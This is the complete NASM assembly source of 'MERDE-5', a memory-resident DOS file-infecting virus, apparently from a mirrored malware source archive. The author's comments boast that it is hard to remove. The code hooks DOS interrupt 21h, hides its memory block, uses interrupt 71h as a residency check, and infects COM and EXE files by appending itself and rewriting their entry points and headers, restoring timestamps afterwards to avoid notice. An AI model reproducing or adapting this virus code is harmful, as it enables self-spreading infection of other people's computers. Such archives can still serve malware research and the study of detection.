mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
613 lines
11 KiB
NASM
613 lines
11 KiB
NASM
; Okay, here is my newest version.. It now
|
||
; offers EXE infection. I messed up command.com
|
||
; compatibility so this version won't infect it.
|
||
; Also, this version might be a little shakey,
|
||
; but it should work okay with most setups
|
||
; (I'm not professional yet, so screw 'em
|
||
; if this hangs!)..
|
||
; This will be the last time I release code for
|
||
; my virii. Thanks to firststrike, and anyone else
|
||
; who has given me tips.....
|
||
; Be careful not to get this, it is kinda hard to get rid
|
||
; of (it would be REALLY hard to get rid of if it infected
|
||
;command.com- I will have to fix that (along with the TERRIBLE
|
||
; inefficiency in my interrupt handler (the loader is OKAY, but
|
||
; My_21 is just kind of a jumble of code thrown together for now.
|
||
; If you want to vaccinate your system, and you know a little about
|
||
; assembler, it isn't that hard. (I gave the come version to
|
||
; myself about 3 times). Just take notice of my use of interrupt
|
||
; 71...(This will be changed in future versions, for obvious reasons).
|
||
; MERDE-5 The merde virus version 5.0- loki
|
||
|
||
|
||
compare_val equ 850
|
||
interrupt equ 21h
|
||
Code_seg Segment Byte
|
||
Assume DS:Code_seg, CS:Code_seg
|
||
ORG 100h
|
||
|
||
start: call get_ip
|
||
|
||
exe_or_com:
|
||
dw 'CO'
|
||
get_ip:
|
||
pop di
|
||
sub di,3
|
||
cmp word ptr cs:[di+3],'EX'
|
||
jne com_memory_loader
|
||
jmp exe_memory_loader
|
||
|
||
;Load memory from within an EXE file..
|
||
;------------------------------------------------------------------------------
|
||
exe_memory_loader:
|
||
call check_for_int_71
|
||
jc go
|
||
call get_memory ;es=my_segment
|
||
jnc aaaa
|
||
jmp exit_exe
|
||
aaaa:
|
||
call hide_memory
|
||
call set_int_71
|
||
call save_21
|
||
push ds
|
||
call move_all_code
|
||
pop ds
|
||
mov bx,es
|
||
call set_21
|
||
go: jmp exit_exe
|
||
|
||
;------------------------------------------------------------------------------
|
||
;******************************************************************************
|
||
;------------------------------------------------------------------------------
|
||
;load memory from a COM file...
|
||
|
||
com_memory_loader:
|
||
call restore_com
|
||
call check_for_int_71
|
||
jc go_1
|
||
call get_memory
|
||
jnc bbbb
|
||
jmp exit_com
|
||
|
||
bbbb: call hide_memory
|
||
|
||
reset_di:
|
||
call set_int_71
|
||
call save_21
|
||
call move_all_code
|
||
mov bx,es
|
||
call set_21
|
||
go_1: jmp exit_com
|
||
|
||
;------------------------------------------------------------------------------
|
||
;Returns ES with my segment (or an error)
|
||
;------------------------------------------------------------------------------
|
||
get_memory:
|
||
int 12h
|
||
mov bx,cs
|
||
mov cx,1024
|
||
mul cx
|
||
clc
|
||
mov cx,600h ;Amount of needed memory
|
||
sub ax,cx
|
||
sbb dx,0000 ;dx:ax=where we want this mem to end!
|
||
mov bx,dx
|
||
mov bp,ax ;save this...
|
||
mov cx,cs
|
||
mov ax,0010h
|
||
mul cx
|
||
clc
|
||
mov cx,di
|
||
add cx,offset ending-100h
|
||
add ax,cx
|
||
adc dx,0000
|
||
clc
|
||
sub bp,ax
|
||
sbb bx,dx
|
||
clc
|
||
mov ax,bp
|
||
mov dx,bx
|
||
mov cx,0010h
|
||
div cx ;dx:ax=memory above this-divide it by 16
|
||
mov bx,ax
|
||
mov ah,4ah
|
||
int 21h
|
||
jc get_memory_error
|
||
mov bx,60
|
||
mov ah,48h
|
||
int 21h
|
||
jc get_memory_error
|
||
mov es,ax
|
||
clc
|
||
ret
|
||
get_memory_error:
|
||
stc
|
||
ret
|
||
;------------------------------------------------------------------------------
|
||
;Moves all code + PSP to my secretive little segment-destroys DS (in EXE files)
|
||
;------------------------------------------------------------------------------
|
||
move_all_code:
|
||
;move PSP**************************
|
||
push di
|
||
xor si,si
|
||
xor di,di
|
||
mov cx,100h
|
||
rep movsb
|
||
;**********************************
|
||
;move my code**********************
|
||
pop si
|
||
push si
|
||
push cs
|
||
pop ds
|
||
mov cx,offset ending-100h
|
||
rep movsb
|
||
pop di
|
||
ret
|
||
;**********************************
|
||
;------------------------------------------------------------------------------
|
||
;------------------------------------------------------------------------------
|
||
;saves interrupt 21 in cs:[int_21_saveo]
|
||
save_21:
|
||
push es
|
||
xor ax,ax
|
||
mov es,ax
|
||
mov ax,es:[interrupt*4]
|
||
mov bx,es:[interrupt*4+2]
|
||
mov cs:[di+offset int_21_saveo-100h],ax
|
||
mov cs:[di+offset int_21_saves-100h],bx
|
||
pop es
|
||
ret
|
||
|
||
;-----------------------------------------------------------------------------
|
||
;sets interrupt 21 to bx:offset of my_21
|
||
set_21:
|
||
push es
|
||
xor ax,ax
|
||
mov es,ax
|
||
mov es:[interrupt*4],offset my_21
|
||
mov es:[interrupt*4+2],bx
|
||
pop es
|
||
ret
|
||
;-----------------------------------------------------------------------------
|
||
;-----------------------------------------------------------------------------
|
||
;Restores a COM file
|
||
restore_com:
|
||
push di
|
||
mov si,di
|
||
add si,offset three_bytes-100h
|
||
mov di,0100h
|
||
mov cx,3
|
||
rep movsb
|
||
pop di
|
||
ret
|
||
;------------------------------------------------------------------------------
|
||
;Hides my segment's (es) size and owner
|
||
hide_memory:
|
||
push ds
|
||
xor cx,cx
|
||
mov ds,cx
|
||
mov cx,ds:[2eh*4+2]
|
||
pop ds
|
||
push ds
|
||
mov dx,es
|
||
dec dx
|
||
mov ds,dx
|
||
mov ds:[1],cx ;maybe later set to DOS seg
|
||
mov byte ptr ds:[0],'Z'
|
||
mov word ptr ds:[3],0000
|
||
mov es:[16h],cx
|
||
mov es:[0ah],cx
|
||
mov es:[0ch],cx
|
||
pop ds
|
||
ret
|
||
;------------------------------------------------------------------------------
|
||
|
||
;check_for_int 71- My little multiplex interrupt
|
||
check_for_int_71:
|
||
int 71h
|
||
cmp ax,9999h
|
||
je set_c
|
||
clc
|
||
ret
|
||
set_c:
|
||
stc
|
||
ret
|
||
;------------------------------------------------------------------------------
|
||
|
||
;Set interrupt 71:
|
||
set_int_71:
|
||
push ds
|
||
xor ax,ax
|
||
mov ds,ax
|
||
mov ds:[71h*4+2],es
|
||
mov ds:[71h*4],offset my_71
|
||
pop ds
|
||
ret
|
||
|
||
|
||
exit_com:
|
||
xor cx,cx
|
||
xor dx,dx
|
||
xor ax,ax
|
||
xor bx,bx
|
||
xor si,si
|
||
xor di,di
|
||
mov ax,100h
|
||
jmp ax
|
||
|
||
exit_exe:
|
||
push ds
|
||
pop es
|
||
mov ax,es
|
||
add ax,10h
|
||
add word ptr cs:[di+offset orig_cs-100h],ax
|
||
cli
|
||
add ax,word ptr cs:[di+offset orig_ss-100h]
|
||
mov ss,ax
|
||
mov sp,word ptr cs:[di+offset orig_sp-100h]
|
||
sti
|
||
jmp dword ptr cs:[di+offset orig_ip-100h]
|
||
|
||
;------------------------------------------------------------------
|
||
my_21:
|
||
cmp ah,4bh
|
||
je okay_go
|
||
cmp ah,0fh
|
||
je okay_go
|
||
cmp ah,3dh
|
||
je okay_go
|
||
cmp ah,43h
|
||
je okay_go
|
||
jmp continue_21
|
||
okay_go:
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push es
|
||
push di
|
||
push si
|
||
push bp
|
||
push es
|
||
push ds
|
||
check_for_com:
|
||
xor si,si
|
||
mov bx,dx
|
||
looper:
|
||
cmp word ptr ds:[bx+si],'c.'
|
||
je check_om
|
||
cmp word ptr ds:[bx+si],'C.'
|
||
je check_om
|
||
cmp word ptr ds:[bx+si],'e.'
|
||
je check_ex
|
||
cmp word ptr ds:[bx+si],'E.'
|
||
je check_ex
|
||
inc si
|
||
cmp si,40
|
||
jne looper
|
||
jmp give_up1
|
||
check_om:
|
||
cmp word ptr ds:[bx+si+2],'mo'
|
||
jne bb
|
||
mov cs:[com_or_exe],0
|
||
jmp check_for_infection
|
||
bb: cmp word ptr ds:[bx+si+2],'MO'
|
||
jne cc
|
||
mov cs:[com_or_exe],0
|
||
jmp check_for_infection
|
||
cc: jmp give_up1
|
||
check_ex:
|
||
cmp word ptr ds:[bx+si+2],'ex'
|
||
jne label1
|
||
mov cs:[com_or_exe],1234h
|
||
jmp okay_do
|
||
label1:
|
||
cmp word ptr ds:[bx+si+2],'EX' ;FIX ME!!!!!!!
|
||
je cccc ;forget exe for now..
|
||
jmp give_up1
|
||
cccc:
|
||
mov cs:[com_or_exe],1234h
|
||
jmp okay_do
|
||
check_for_infection:
|
||
cmp word ptr [bx+si-2],'DN'
|
||
jne okey_k
|
||
jmp give_up1
|
||
okey_k:
|
||
cmp word ptr [bx+si-2],'DN'
|
||
jne okay_do
|
||
jmp give_up1
|
||
okay_do:
|
||
mov cs:[storage_1],ds
|
||
mov cs:[storage_2],dx
|
||
mov ah,50h ;set PSP to ours
|
||
push cs
|
||
pop bx
|
||
call dos_21
|
||
mov ah,43h
|
||
xor al,al
|
||
call dos_21
|
||
jnc okay9
|
||
jmp give_up
|
||
okay9: mov cs:[attrib],cx
|
||
mov ah,43h
|
||
mov al,1
|
||
xor cx,cx
|
||
call dos_21
|
||
mov ah,3dh
|
||
mov al,2
|
||
call dos_21
|
||
jnc okay10
|
||
jmp give_up
|
||
okay10: mov cs:[handle],ax
|
||
mov bx,ax
|
||
mov ah,57h
|
||
xor al,al
|
||
call dos_21
|
||
mov cs:[date],dx
|
||
mov cs:[time],cx
|
||
mov ax,4202h
|
||
xor dx,dx
|
||
xor cx,cx
|
||
call dos_21
|
||
jnc okay11
|
||
jmp give_up
|
||
okay11: mov cs:[file_size],ax
|
||
cmp cs:[com_or_exe],1234h
|
||
jne okey_p
|
||
sub ax,compare_val
|
||
sbb dx,0000
|
||
mov cx,dx
|
||
mov dx,ax
|
||
jmp contin2
|
||
okey_p: xor cx,cx
|
||
cmp ax,63000
|
||
jb contin1
|
||
call reset_all
|
||
jmp give_up
|
||
contin1:
|
||
cmp ax,600
|
||
jnb continx
|
||
call reset_all
|
||
jmp give_up
|
||
continx:
|
||
sub ax,compare_val
|
||
mov dx,ax
|
||
xor cx,cx
|
||
contin2:
|
||
mov ax,4200h
|
||
mov bx,cs:[handle]
|
||
call dos_21
|
||
mov ah,3fh
|
||
push cs
|
||
pop ds
|
||
mov dx,offset buffer
|
||
mov cx,2
|
||
call dos_21
|
||
mov ax,word ptr cs:[buffer]
|
||
mov bx,word ptr cs:[offset dont_write-compare_val]
|
||
cmp ax,bx
|
||
jne dddd
|
||
jmp give_up
|
||
dddd:
|
||
cmp cs:[com_or_exe],1234h
|
||
je infect_exe
|
||
jmp infect_com
|
||
|
||
infect_exe:
|
||
mov bx,cs:[handle]
|
||
xor dx,dx
|
||
xor cx,cx
|
||
mov ax,4200h
|
||
call dos_21
|
||
push cs
|
||
pop ds
|
||
mov ah,3fh
|
||
mov cx,18h
|
||
mov dx,offset header
|
||
call dos_21
|
||
cmp word ptr [header+8],1000h
|
||
jb okayh
|
||
call reset_all
|
||
jmp give_up
|
||
okayh: mov ax,word ptr [header+16h]
|
||
mov orig_cs,ax
|
||
mov ax,word ptr [header+14h]
|
||
mov orig_ip,ax
|
||
mov ax,word ptr [header+0eh]
|
||
mov orig_ss,ax
|
||
mov ax,word ptr [header+10h]
|
||
mov orig_sp,ax
|
||
mov ax,4202h
|
||
mov bx,handle
|
||
xor cx,cx
|
||
xor dx,dx
|
||
call dos_21
|
||
mov word ptr ds:[exe_or_com],'EX'
|
||
mov high_size,dx
|
||
mov low_size,ax
|
||
mov real_hsize,dx
|
||
mov real_lsize,ax
|
||
mov ax,word ptr [header+8]
|
||
mov cx,10h
|
||
mul cx
|
||
clc
|
||
sub low_size,ax ;high_size:low_size=load size
|
||
sbb high_size,dx
|
||
clc
|
||
mov dx,high_size
|
||
mov ax,low_size
|
||
mov cx,0010h
|
||
div cx
|
||
cmp dx,0
|
||
je okay
|
||
mov cx,16
|
||
sub cx,dx
|
||
mov bp,cx
|
||
add real_lsize,bp
|
||
adc real_hsize,0000
|
||
clc
|
||
stc
|
||
adc ax,0000
|
||
jmp okay1
|
||
okay: xor bp,bp
|
||
okay1: xor dx,dx
|
||
mov word ptr [header+16h],ax
|
||
;add to dx?
|
||
mov word ptr [header+14h],dx
|
||
mov word ptr [header+0eh],ax
|
||
mov dx,0fffeh
|
||
mov word ptr [header+10h],dx
|
||
mov dx,real_hsize
|
||
mov ax,real_lsize
|
||
add ax,offset ending-100h+1
|
||
adc dx,0000
|
||
push ax
|
||
mov cl,9
|
||
shr ax,cl
|
||
ror dx,cl
|
||
stc
|
||
adc dx,ax
|
||
pop ax
|
||
and ah,1
|
||
mov word ptr [header+4],dx
|
||
mov word ptr [header+2],ax
|
||
mov ah,40h
|
||
mov bx,handle
|
||
mov cx,offset dont_write-100h
|
||
add cx,bp
|
||
mov dx,100h
|
||
sub dx,bp
|
||
call dos_21
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov bx,handle
|
||
call dos_21
|
||
mov ah,40h
|
||
mov bx,handle
|
||
mov cx,18h
|
||
mov dx,offset header
|
||
call dos_21
|
||
call reset_all
|
||
jmp give_up
|
||
|
||
infect_com:
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov bx,cs:[handle]
|
||
mov ax,4200h
|
||
call dos_21
|
||
mov ah,3fh
|
||
mov cx,3
|
||
push cs
|
||
pop ds
|
||
mov dx,offset three_bytes
|
||
call dos_21
|
||
mov ax,cs:[file_size]
|
||
sub ax,3
|
||
mov word ptr cs:[jumper+1],ax
|
||
mov word ptr cs:[exe_or_com],'CO'
|
||
call write_to_end
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4200h
|
||
mov bx,cs:[handle]
|
||
call dos_21
|
||
mov dx,offset jumper
|
||
mov ah,40h
|
||
mov cx,3
|
||
call dos_21
|
||
call reset_all
|
||
give_up:
|
||
mov ah,50h
|
||
mov bx,cs:[storage_1]
|
||
call dos_21
|
||
give_up1:
|
||
pop ds
|
||
pop es
|
||
pop bp
|
||
pop si
|
||
pop di
|
||
pop es
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
jmp continue_21
|
||
continue_21:
|
||
jmp dword ptr cs:[int_21_saveo]
|
||
dos_21:
|
||
pushf
|
||
call dword ptr cs:[int_21_saveo]
|
||
ret
|
||
|
||
reset_all:
|
||
mov bx,cs:[handle]
|
||
mov cx,cs:[time]
|
||
mov dx,cs:[date]
|
||
mov ax,5701h
|
||
call dos_21
|
||
mov ah,3eh
|
||
mov bx,cs:[handle]
|
||
call dos_21
|
||
mov ah,43h
|
||
mov al,1
|
||
mov cx,cs:[attrib]
|
||
mov ds,cs:[storage_1]
|
||
mov dx,cs:[storage_2]
|
||
call dos_21
|
||
ret
|
||
|
||
write_to_end:
|
||
|
||
mov ax,4202h
|
||
xor dx,dx
|
||
xor cx,cx
|
||
mov bx,cs:[handle]
|
||
call dos_21
|
||
mov ah,40h
|
||
mov cx,offset dont_write-100h
|
||
push cs
|
||
pop ds
|
||
mov dx,0100h
|
||
call dos_21
|
||
ret
|
||
my_71:
|
||
mov ax,9999h
|
||
iret
|
||
|
||
|
||
jumper:
|
||
db 0e9h,00,00
|
||
storage_1 dw 0000
|
||
storage_2 dw 0000
|
||
int_21_saveo dw 0000
|
||
int_21_saves dw 0000
|
||
three_bytes: db 0cdh,20h,90h
|
||
db 'Loki'
|
||
orig_ip dw 0000
|
||
orig_cs dw 0000
|
||
orig_ss dw 0000
|
||
orig_sp dw 0000
|
||
dont_write:
|
||
|
||
header:
|
||
db 24 dup(00)
|
||
com_or_exe dw 1234h
|
||
handle dw 0000
|
||
file_size dw 0000
|
||
attrib dw 0000
|
||
date dw 0000
|
||
time dw 0000
|
||
buffer: dw 0000
|
||
loader_high dw 0000
|
||
loader_low dw 0000
|
||
header_cs dw 0000
|
||
header_ip dw 0000
|
||
low_size dw 0000
|
||
high_size dw 0000
|
||
real_hsize dw 0000
|
||
real_lsize dw 0000
|
||
ending:
|
||
Code_seg ENDS
|
||
END start |